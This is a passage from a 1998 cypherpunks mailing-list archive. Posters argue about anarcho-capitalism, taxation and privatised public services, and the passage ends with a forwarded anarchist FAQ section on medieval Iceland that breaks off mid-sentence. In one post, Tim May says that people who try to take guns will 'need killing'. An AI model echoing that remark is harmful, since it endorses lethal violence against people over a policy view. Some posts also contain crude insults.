    9. The Little Devil is a large (14 x 16 cm) face mirror made out of clay. 
    10. Goderich Chrysler Plymouth Dodge Trucks, Goderich, Ontario, Canada, new and used vehicles

Wow. Just like 4th-generation development languages put
programmers out of business, these search engines will
eliminate the need for any other form of advertising.

---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:03:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
Message-ID: <199811110129.TAA21263@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 16:05:08 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)

> > Explain how the system works. Explain how the various systems operate, how
> > the costs are calculated, and how they're paid. I want to see the same level
> > of *specificity* that I and others have agreed to provide you in our
> > examples.
> 
> Do you have any idea what you're asking for?

More than you can produce apparently.

> Quite frankly, I do not have the time (nor the space) to explain to you,
> in detail, how an entire civilization operates.  In fact, any attempt by
> me to explain such a system would fail, since there are doubtless many
> innovations which specialists in the respective fields would make, and
> there are many more which have already been made, which I am not
> necessarilly aware of.

If you can't explain your system to me in sufficient detail then perhaps
it's because you don't understand it.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:12:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811110138.TAA21400@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 12:33:04 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> 	Theft, violence and extortion are already legitimate, not only does
> the government use them all the time, but corporations and indivuduals do
> as well.

True, at least under a democratic system we can prevent some of the more
gross abuses by government and can address the inter-personal issues with
something besides a nylon jacketed .357. Your anarcho-whatever doesn't even
provide that.

> 	There is no (or little) justice under the current system. When was
> the last time a cop went to jail for a murder that he/she committed while
> on duty. Is OJ behind bars?

Several cops in Houston were fired (they got no-billed by the Grand Jury)
just last week because of a similar issue. There are two cops here in Austin
who went to jail because of a murder (they held a kid down on a water bed
and he suffocated) charge. The current public overwatch group was the result
of a police call that got out of hand last year and the police had two
choices - either give the people what they asked for or end loose the civil
rights case. The two cops who beat Rodney King ended up doing time.

Nobody proved to the jury beyond a shadow of a doubt he was guilty. It is
far better to let a dozen guilty men go free than to imprison a single
innocent one. Our legal system may have its problem but I guarantee that a
lot more guilty people get off scott free than innocent people end up in
jail.

There is more than a little justice under the current system (OJ being the
perfect example - like it or not).

> 	We have courts of Law, Justice is ashamed to show her face.

Somehow I doubt that. If justice is ashamed of anything its that citizens of
this country don't participate more and express their views with more
conviction.

> 	We recognize that these interactions exist, but guess what, for any
> sort  of anarchy to exist, it has to happen globally. We are as concerned
> about the people on the other side of the planet as we are about the people
> in the next city over. Just not much.

Which, considering that anarchic systems permit murder, theft, rape,
extortion, etc. without reprisal or limits, means that the vast majority of
people are probably going to sleep a sounder sleep knowing they don't have
to go out and buy a tank tomorrow just to make sure they have a home to come
to in the evening.

> 	No, we assume the opposite, that nothing works for large numbers of
> people, and everyone should be free to find their own level.

If nothing works for large numbers of people then why should this? Anarchy
isn't freedom, it's opportunity to make huge profits with no responsiblity
and at the expence of others (who are treated as a market commodity and not
human beings).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:10:21 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
Message-ID: <199811110150.TAA21515@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 15:57:04 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)

> > Without some government the Bad Guys will be the only ones with anything.
> > It is only with the threat of losing their power that leaders do good. If
> > they had no power which could be lost or taken they will always do what's
> > best for them in the short term, which is usually to shit on the peons.
> > Dictators (like Pinochet and Gates) do their dirty deeds because they feel
> > no need to placate the masses.
> 
> If they wield no real power, and proceed to do whatever is best for them
> in the short term, they will be screwing themselves over in the long
> term (or short term, if doing what they want results in someone shooting
> them in self defense).

If they have that kind of power they will have the shooter shot, look at the
history of leaders and assassinations. The reality is that the vast majority
of them fail. There is the other aspect that if one is willing to
assassinate (murder in plain english) simply because somebody else murdered
then we are in fact trading one tyrant for another.

> And precisely what dirty deeds has Mr. Gates ever done?

Every un-fair market practice he could get away with (why is it that
anarcho-whatever types always leave that 'fair competition' out of their
discussion?). Why do you believe the Halloween documents are so
enlightening? Because they demonstrate without a shadow of doubt that Billy
wanted to exist as the sole market force, not a force limited by fair
competition. The concept of fair-competition is anti-thematic to the
world-domination memes that are currently making the rounds.

>  Excluding those
> actions in which the judicious use of state regulation was involved.

Hell, if we just look at the business practices within the context of
a market with fair competition it's clear he's so far out in left field he's
playing by himself.

> Yah, and then somebody else points a gun at Mr. would-be warlord and
> goes Bang, Bang, he's dead  (it's unsafe having warlords about --sorta
> like scorpions).  That is, if Mr. would-be manages to shoot me without
> being shot himself.

Well I'd say if you're running around shooting people for any reason other
than immediate self defence you deserve what you get.

> > Try to lift yourself out of the bullshit of your theory and give us at
> > least one REAL example (current or historic) of a large scale, long lasting
> > anarcho-capitalist society. Hippie communes are too small, and make sure
> > it's capitalistic. If you can't think of one in the next year or so then
> > come back and tell us.
> 
> It hasn't happened yet.  But then, neither had the USA, before 1776. 
> The above is not a reasonable argument.

It is at least a start, there was ample evidence historicaly that democracy
(you ever hear of the Dutch?) was tried to varying degrees. It seems to work
out better than any other system we've developed.

If you want to see a discussion of democracy prior to the US check out:

On the improvement of the understanding; The Ethics; Correspondence
Benedict de Spinoza
ISBN 0-486-20250-x
$7.95 (Dover)

They were written in the mid to late 1600's (shortly before the birth of
the founding fathers).
   
> You can, of course, as me how it *could* happen.  And unfortunately,
> you're partially correct, it couldn't happen under current conditions. 
> The amount of personal firepower that is easily accessible by everyone
> is not sufficient to back up the soverignity of each individual.

So, in your mind the only way to defend oneself is to have a bigger dick..um
I mean gun than the other guy....

I've a couple of quotes for you to ponder:

Genius is 1% inspiration and 99% persperation.

                             T.E. Edison

If Mr. Edison had though smarter he wouldn't have had to perspire as much.

                                                   N. Tesla


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:12:14 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: most of what govts do can be done by business, and done better (Re: How to solve the tax problem w/o anarchy or force) (fwd)
Message-ID: <199811110151.TAA21565@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 20:39:05 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: most of what govts do can be done by business, and done better (Re: How to solve the tax problem w/o anarchy or force)

> Even when government does sub-contract, the inefficiency is usually I
> think pretty horrendous by industry standards:

The same can be said for business in general as well (especialy if there is
no competition).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:09:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone) (fwd)
Message-ID: <199811110154.TAA21649@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 13:28:11 -0700 (MST)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone) (fwd)

> (1) Social transfer payments at the point of a gun are involuntary
> compassion.
> 
> (2) Involutary compassion is usually called rape.

No, thats' lust not compassion. Involuntary lust is called rape.

> Combine this with the US Govt defining a sex life as a "right"
> (witness free Viagra) and you come up with some pretty 
> chilling scenarios.
> 
> (do people have the "right" to a sex partner?)

Read the 9th Amendment. I'd say so.

> Whats to stop rape of selected human beings by agents of
> the federal government?  (ok, maybe thats going a little
> too far

The 4th Amendment among others.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:11:06 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: most of what govts do can be done by business, and done (fwd)
Message-ID: <199811110156.TAA21708@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 18:00:44 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: most of what govts do can be done by business, and done
>  better (Re: How to solve the tax problem w/o anarchy or force)

> 	Roads are the easiest (assuming a government model) things to apply
> road use taxes to, simply tax gasoline, oil, and tires. Scale your tire tax
> based on weight and apply it to bicycles as well, then everyone (execpt
> peds) who uses pays.

Screw that, tax the shoes.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Nov 1998 12:56:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <199811102122.NAA18762@netcom13.netcom.com>
Message-ID: <v03130310b26ec4354c66@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:25 PM -0800 11/10/98, b!X wrote:
>Yeah yeah all very well and good parody except that the 2nd amendment
>contains the word "well-regulated" and the 1st doesn't.
>
>(And yes I know I'm asking for a shitstorm of trouble saying that on THIS
>list of all places).
>

No, you are welcome to _say_ damned near anything you want to say.

However, graduate from _saying_ things to grabbing our guns, that's when
you'll need killing.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 10:59:12 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Question about insurance managed fire services...
Message-ID: <199811110238.UAA22090@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



How does company A guarantee that company B won't begin to burn down the
customers of company A so that the economic impact on A is sufficient they
can't participate in the market?


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 11 Nov 1998 07:22:38 +0800
To: vznuri@netcom.com
Subject: most of what govts do can be done by business, and done better (Re: How to solve the tax problem w/o anarchy or force)
In-Reply-To: <199811100157.RAA05844@netcom13.netcom.com>
Message-ID: <199811102039.UAA09523@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Vladimir Nuri writes:
> the distinction between govt and business is sometimes an
> arbitrary one. for example govt agencies typically contract
> with private companies to perform govt services. a massive
> example of this is the defense industry. what I would tend
> to propose is a system where this is augmented and finetuned
> to the point the govt become a very efficient sorting mechanism
> for channeling money to businesses that are the most efficient.

Even when government does sub-contract, the inefficiency is usually I
think pretty horrendous by industry standards:

1. the subcontracted work is probably not at all desired by the
customers (us the tax payers)

2. the subcontracted work is probably poorly specified, so the
contractor does work which inefficiently works towards the customers
requirements

3. because governments are monopolies they have no incentive to choose
the best value for money contract, or to try hard to obtain reasonable
contracts

4. because governments employees are often corrupt kick backs are
taken by corrupt employees to accept other than the best value for
money contractor

> AB, I disagree that people would opt out of virtually all govt
> services. bzzzzzzzt. think of things like trash collection etc.
> I do believe the vast majority of things the govt does would
> tend to stay there even if people had a choice.

Everything that can easily be privatised would either be privatised
(because it would be so much cheaper without all the corruption,
ineptitude and lack of efficiency insentive), or for the first time
some competition would be introduced into government and they would
actually compete on an even basis.  Either outcome is preferable over
the current situation, and a direct result of allowing competition.

> the big libertarian question is, as you raise it: should people
> have to pay for things they don't want. 

absolutely not.

> well consider things like roads, 

if you don't drive you shouldn't have to pay for them.

> police

if you have hired a private security firm for protection you shouldn't
have to pay for the police (who as others have noted mostly do
unproductive things, and prosecute victimless crimes, and generally
harrass people).

> or fire protection

well if your house burns down, and you haven't taken fire insurance
with a fire fighting service, and can't afford the fee, well that's
tough luck.

> or the court system.  

I don't want to subsidize arbitration services locking away people for
victimless crimes, so I will subscribe to arbitration services which
don't do this.  See "Machinery of Freedom" by David Friedman for a
plausible frame work for choice in arbitration services and intra
service negotations.

Note quite a lot of business use independent arbitration services,
because it is much cheaper, fairer, and more predictable than the
government monopoly court system.

> what if you don't pay, but then dial 911 anyway?

they ask for your to authenticate your chaumian credential insurancce
contract.  if you can't do that they don't come, same as any other
0800-RENTACOP service.

> or you dial 911 and they ask for your credit card first? <g>

yup, exactly.

> it really does seem to me like there is a legitimate role for a
> certain amount of money to be collected for govt service. 

I think you can privatise everything.  Things which are called natural
monopolies could be managed by trade organisations or companies
bidding for management getting efficiency related fees.  Why should
politicians and the rest manage roads, why not a company.

> imho it is far, far less than whatis being collected today. 

zero I think woudl be best, or very very close.

> if taxes were 5-10% people wouldn't give as much a damn about the
> govt and how it worked. 

What all could you spend 5-10% of GNP on that couldn't be privatised?
Sounds like an awful lot of legalised theft yet!

> libertarians tend to be awfully realistic some times. who pays for
> roads when everyone uses them? 

don't pay not allowed to use.  not everyone uses them to drive cars
on.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 11:11:59 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Question about anarchic systems and natural disasters
Message-ID: <199811110253.UAA22178@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



What would be the responce of a anarchic system that was based on profit in
regards something like Mitch's impact on Ctl. America and their plea for
food and aid?


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 11:34:06 +0800
To: cypherpunks@einstein.ssz.com
Subject: secF9.html
Message-ID: <199811110307.VAA22246@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   
   
F.9 IS MEDIEVAL ICELAND AN EXAMPLE OF "ANARCHO"-CAPITALISM WORKING IN PRACTICE?
                                       
   
   
   Ironically, medieval Iceland is a good example of why
   "anarcho"-capitalism will not work, degenerating into de facto rule by
   the rich. It should be pointed out first that Iceland, nearly 1,000
   years ago, was not a capitalistic system. In fact, like most cultures
   claimed by "anarcho"-capitalists as examples of their "utopia," it was
   a communal, not individualistic, society, based on artisan production,
   with extensive communal institutions as well as individual "ownership"
   (i.e. use) and a form of social self-administration, the thing -- both
   local and Iceland-wide -- which can be considered a "primitive" form
   of the anarchist communal assembly.
   
   As William Ian Miller points out "[p]eople of a communitarian nature.
   . . have reason to be attracted [to Medieval Iceland]. . . the limited
   role of lordship, the active participation of large numbers of free
   people . . . in decision making within and without the homestead. The
   economy barely knew the existence of markets. Social relations
   preceded economic relations. The nexus of household, kin, Thing, even
   enmity, more than the nexus of cash, bound people to each other. The
   lack of extensive economic differentiation supported a weakly
   differentiated class system . . . [and material] deprivations were
   more evenly distributed than they would be once state institutions
   also had to be maintained." [Bloodtaking and Peacemaking: Feud, Law
   and Society in Saga Iceland, p. 306]
   
   Kropotkin in Mutual Aid indicates that Norse society, from which the
   settlers in Iceland came, had various "mutual aid" institutions,
   including communal land ownership (based around what he called the
   "village community") and the thing (see also Kropotkin's The State:
   Its Historic Role for a discussion of the "village community"). It is
   reasonable to think that the first settlers in Iceland would have
   brought such institutions with them and Iceland did indeed have its
   equivalent of the commune or "village community," the Hreppar, which
   developed early in the country's history. Like the early local
   assemblies, it is not much discussed in the Sagas but is mentioned in
   the law book, the Grgs, and was composed of a minimum of twenty
   farms and had a five member commission. The Hreppar was self-governing
   and, among other things, was responsible for seeing that orphans and
   the poor within the area were fed and housed. The Hreppar also served
   as a property insurance agency and assisted in case of fire and losses
   due to diseased livestock. The Hreppar may have also have organised
   and controlled summer grazing lands (which in turn suggests "commons"
   -- i.e. common land -- of some kind).
   
   Thus Icelandic society had a network of solidarity, based upon
   communal life. In practice this meant that "each commune was a mutual
   insurance company, or a miniature welfare state. And membership in the
   commune was not voluntary. Each farmer had to belong to the commune in
   which his farm was located and to contribute to its needs."
   [Gissurarson quoted by Birgit T. Runolfsson Solvason, Ordered Anarchy,
   State and Rent-Seeking: The Icelandic Commonwealth, 930-1262] However,
   unlike an anarchist society, the Icelandic Commonwealth did not allow
   farmers not to join its communes.
   
   Therefore, the Icelandic Commonwealth can hardly be claimed in any
   significant way as an example of "anarcho"-capitalism in practice.
   This can also be seen from the early economy, where prices were
   subject to popular judgement at the skuldaping ("payment-thing") not
   supply and demand. [Kirsten Hastrup, Culture and History in Medieval
   Iceland, p. 125] Indeed, with its communal price setting system in
   local assemblies, the early Icelandic commonwealth was more similar to
   Guild Socialism (which was based upon guild's negotiating "just
   prices" for goods and services) than capitalism. Therefore Miller
   correctly argues that it would be wrong to impose capitalist ideas and
   assumptions onto Icelandic society:
   
   "Inevitably the attempt was made to add early Iceland to the number of
   regions that socialised people in nuclear families within simple
   households. . . what the sources tell us about the shape of Icelandic
   householding must compel a different conclusion." [Op. Cit., p. 112]
   
   In other words, Kropotkin's analysis of communal society is far closer
   to the reality of Medieval Iceland than David Friedman's attempt in
   The Machinery of Freedom to turn it into a capitalist utopia.
   
   However, the communal nature of Icelandic society also co-existed (as
   in most such cultures) with hierarchical institutions, including some
   with capitalistic elements, namely private property and "private
   states" around the local godar. The godar were local chiefs who also
   took the role of religious leaders. As the Encyclopaedia Britannica
   explains, "a kind of local government was evolved [in Iceland] by
   which the people of a district who had most dealings together formed
   groups under the leadership of the most important or influential man
   in the district" (the godi). The godi "acted as judge and mediator"
   and "took a lead in communal activities" such as building places of
   worship. These "local assemblies. . . are heard of before the
   establishment of the althing" (the national thing). This althing led
   to co-operation between the local assemblies.
   
   Therefore we see communal self-management in a basic form, plus
   co-operation between communities as well. These communistic,
   mutual-aid features exist in many non-capitalist cultures and are
   often essential for ensuring the people's continued freedom within
   those cultures (section B.2.5 on why the wealthy undermine these
   popular "folk-motes" in favour of centralisation). Usually, the
   existence of private property (and so inequality) soon led to the
   destruction of communal forms of self-management (with participation
   by all male members of the community as in Iceland), which are
   replaced by the rule of the rich.
   
   While such developments are a commonplace in most "primitive"
   cultures, the Icelandic case has an unusual feature which explains the
   interest it provokes in "anarcho"-capitalist circles. This feature was
   that individuals could seek protection from any godi. As the
   Encyclopaedia Britannica puts it, "the extent of the godord
   [chieftancy] was not fixed by territorial boundaries. Those who were
   dissatisfied with their chief could attach themselves to another godi.
   . . As a result rivalry arose between the godar [chiefs]; as may be
   seen from the Icelandic Sagas." It is these Sagas on which David
   Friedman (in The Machinery of Freedom) bases his claim that Medieval
   Iceland is a working example of "anarcho" capitalism.
   
   Hence we can see that artisans and farmers would seek the "protection"
   of a godi, providing their labour in return. These godi would be
   subject to "market forces," as dissatisfied individuals could
   affiliate themselves to other godi. This system, however, had an
   obvious (and fatal) flaw. As the Encyclopaedia Britannica points out:
   
   "The position of the godi could be bought and sold, as well as
   inherited; consequently, with the passing of time, the godord for
   large areas of the country became concentrated in the hands of one man
   or a few men. This was the principal weakness of the old form of
   government: it led to a struggle of power and was the chief reason for
   the ending of the commonwealth and for the country's submission to the
   King of Norway."
   
   It was the existence of these hierarchical elements in Icelandic
   society that explain its fall from anarchistic to statist society. As
   Kropotkin argued "from chieftainship sprang on the one hand the State
   and on the other private property." [Act for Yourselves, p. 85]
   Kropotkin's insight that chieftainship is a transitional system has
   been confirmed by anthropologists studying "primitive" societies. They
   have come to the conclusion that societies made up of chieftainships
   or chiefdoms are not states: "Chiefdoms are neither stateless nor
   state societies in the fullest sense of either term: they are on the
   borderline between the two. Having emerged out of stateless systems,
   they give the impression of being on their way to centralised states
   and exhibit characteristics of both." [Y. Cohen quoted by Birgit T.
   Runolfsson Solvason, Op. Cit.] Since the Commonwealth was made up of
   chiefdoms, this explains the contradictory nature of the society - it
   was in the process of transition, from anarchy to statism, from a
   communal economy to one based on private property.
   
   The political transition within Icelandic society went hand in hand
   with an economic transition (both tendencies being mutually
   reinforcing). Initially, when Iceland was settled, large-scale farming
   based on extended households with kinsmen was the dominant economic
   mode. This semi-communal mode of production changed as the land was
   divided up (mostly through inheritance claims) between the 10th and
   11th centuries. This new economic system based upon individual
   possession and artisan production was then slowly displaced by tenant
   farming, in which the farmer worked for a landlord, starting in the
   late 11th century. This economic system (based on a form of wage
   labour, i.e. capitalistic production) ensured that "great variants of
   property and power emerged." [Kirsten Hastrup, Culture and History in
   Medieval Iceland, pp. 172-173] During the 12th century wealth
   concentrated into fewer and fewer hands and by its end an elite of
   around 6 wealthy and powerful families had emerged.
   
   During this evolution in ownership patterns and the concentration of
   wealth and power into the hands of a few, we should note that the
   godi's and wealthy landowners' attitude to profit making also changed,
   with market values starting to replace those associated with honour,
   kin, and so on. Social relations became replaced by economic relations
   and the nexus of household, kin and Thing was replaced by the nexus of
   cash and profit. The rise of capitalistic social relationships in
   production and values within society was also reflected in exchange,
   with the local marketplace, with its pricing "subject to popular
   judgement" being "subsumed under central markets." [Ibid., p. 225]
   
   With a form of wage labour being dominant within society, it is not
   surprising that great differences in wealth started to appear. Also,
   as protection did not come free, it is not surprising that a godi
   tended to become rich also. This would enable him to enlist more
   warriors, which gave him even more social power (in Kropotkin's words,
   "the individual accumulation of wealth and power"). Powerful godi
   would be useful for wealthy landowners when disputes over land and
   rent appeared, and wealthy landowners would be useful for a godi when
   feeding his warriors. Production became the means of enriching the
   already wealthy, with concentrations of wealth producing
   concentrations of social and political power (and vice versa).
   Kropotkin's general summary of the collapse of "barbarian" society
   into statism seems applicable here - "after a hard fight with bad
   crops, inundations and pestilences, [farmers]. . . began to repay
   their debts, they fell into servile obligations towards the protector
   of the territory. Wealth undoubtedly did accumulate in this way, and
   power always follows wealth." [Mutual Aid, p. 131]
   
   The transformation of possession into property and the resulting rise
   of hired labour was a key element in the accumulation of wealth and
   power, and the corresponding decline in liberty among the farmers.
   Moreover, with hired labour springs dependency -- the worker is now
   dependent on good relations with their landlord in order to have
   access to the land they need. With such reductions in the independence
   of part of Icelandic society, the undermining of self-management in
   the various Things was also likely as labourers could not vote freely
   as they could be subject to sanctions from their landlord for voting
   the "wrong" way. Thus hierarchy within the economy would spread into
   the rest of society, and in particular its social institutions,
   reinforcing the effects of the accumulation of wealth and power.
   
   The resulting classification of Icelandic society played a key role in
   its move from relative equality and anarchy to a class society and
   statism. As Millar points out:
   
   "as long as the social organisation of the economy did not allow for
   people to maintain retinues, the basic egalitarian assumptions of the
   honour system. . . were reflected reasonably well in reality. . . the
   mentality of hierarchy never fully extricated itself from the
   egalitarian ethos of a frontier society created and recreated by
   juridically equal farmers. Much of the egalitarian ethic maintained
   itself even though it accorded less and less with economic realities.
   . . by the end of the commonwealth period certain assumptions about
   class privilege and expectations of deference were already well enough
   established to have become part of the lexicon of self-congratulation
   and self-justification." [Op. Cit., pp. 33-4]
   
   This process in turn accelerated the destruction of communal life and
   the emergence of statism, focused around the godord. In effect, the
   godi and wealthy farmers became rulers of the country and "the old
   form of government became modified in the course of time." This change
   from a communalistic, anarchistic society to a statist, propertarian
   one can also be seen from this quote from an article on Iceland by
   Hallberg Hallmundsson in the Encyclopaedia Americana, which identifies
   wealth concentration in fewer and fewer hands as having been
   responsible for undermining Icelandic society:
   
   "During the 12th century, wealth and power began to accumulate in the
   hands of a few chiefs, and by 1220, six prominent families ruled the
   entire country. It was the internecine power struggle among these
   families, shrewdly exploited by King Haakon IV of Norway, that finally
   brought the old republic to an end."
   
   This process, wherein the concentration of wealth leads to the
   destruction of communal life and so the anarchistic aspects of a given
   society, can be seen elsewhere, for example, in the history of the
   United States after the Revolution or in the degeneration of the free
   cities of Medieval Europe. Peter Kropotkin, in his classic work Mutual
   Aid, documents this process in some detail, in many cultures and time
   periods. However, that this process occurred in a society which is
   used by "anarcho"-capitalists as an example of their system in action
   reinforces the anarchist analysis of the statist nature of
   "anarcho"-capitalism and the deep flaws in its theory, as discussed in
   section F.6.
   
   As Miller argues, "[i]t is not the have-nots, after all, who invented
   the state. The first steps toward state formation in Iceland were made
   by churchmen. . . and by the big men content with imitating Norwegian
   royal style. Early state formation, I would guess, tended to involve
   redistributions, not from rich to poor, but from poor to rich, from
   weak to strong." [Op. Cit., p. 306]
   
   David Friedman is aware of how the Icelandic Republic degenerated and
   its causes. He states in a footnote in his 1979 essay "Private
   Creation and Enforcement of Law: A Historical Case" that the "question
   of why the system eventually broke down is both interesting and
   difficult. I believe that two of the proximate causes were increased
   concentration of wealth, and hence power, and the introduction into
   Iceland of a foreign ideology -- kingship. The former meant that in
   many areas all or most of the godord were held by one family and the
   latter that by the end of the Sturlung period the chieftains were no
   longer fighting over the traditional quarrels of who owed what to
   whom, but over who should eventually rule Iceland. The ultimate
   reasons for those changes are beyond the scope of this paper."
   
   However, from an anarchist point of view, the "foreign" ideology of
   kingship would be the product of changing socio-economic conditions
   that were expressed in the increasing concentration of wealth and not
   its cause.
   
   The settlers of Iceland were well aware of the "ideology" of kingship
   for the 300 years during which the Republic existed. However, only the
   concentration of wealth allowed would-be Kings the opportunity to
   develop and act and the creation of boss-worker social relationships
   on the land made the poor subject to, and familiar with, the concept
   of authority. Such familiarity would spread into all aspects of life
   and, combined with the existence of "prosperous" (and so powerful)
   godi to enforce the appropriate servile responses, ensured the end of
   the relative equality that fostered Iceland's anarchistic tendencies
   in the first place.
   
   In addition, as private property is a monopoly of rulership over a
   given area, the conflict between chieftains for power was, at its most
   basic, a conflict of who would own Iceland, and so rule it. The
   attempt to ignore the facts that private property creates rulership
   (i.e. a monopoly of government over a given area) and that monarchies
   are privately owned states does Friedman's case no good. In other
   words, the system of private property has a built in tendency to
   produce both the ideology and fact of Kingship - the power structures
   implied by Kingship are reflected in the social relations which are
   produced by private property.
   
   Friedman is also aware that an "objection [to his system] is that the
   rich (or powerful) could commit crimes with impunity, since nobody
   would be able to enforce judgement against them. Where power is
   sufficiently concentrated this might be true; this was one of the
   problems which led to the eventual breakdown of the Icelandic legal
